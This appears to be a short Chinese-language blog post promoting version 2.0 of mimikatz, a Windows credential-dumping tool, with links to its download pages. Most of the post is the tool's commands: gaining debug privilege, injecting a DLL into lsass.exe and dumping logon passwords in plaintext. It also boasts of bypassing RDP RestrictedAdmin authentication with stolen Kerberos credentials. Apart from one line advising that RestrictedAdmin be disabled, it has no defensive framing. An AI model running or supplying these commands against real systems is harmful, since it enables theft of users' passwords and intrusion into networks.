神器mimikatz

  • A+
所属分类:神兵利刃

神器咪咪卡住最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP)的登陆认证。建议默认禁止RestrictedAdmin模式登录。

V1.0

//开始运行神器

mimikatz

//提升权限

privilege::debug

//注入dll

inject::process lsass.exe sekurlsa.dll

//抓取密码

@getLogonPasswords

V2.0

//开始运行神器

mimikatz

//提升权限

privilege::debug

sekurlsa::logonpasswords

不管密码多么复杂都能抓出来

作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

下载地址:

https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150419a

OR

https://github.com/gentilkiwi/mimikatz

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: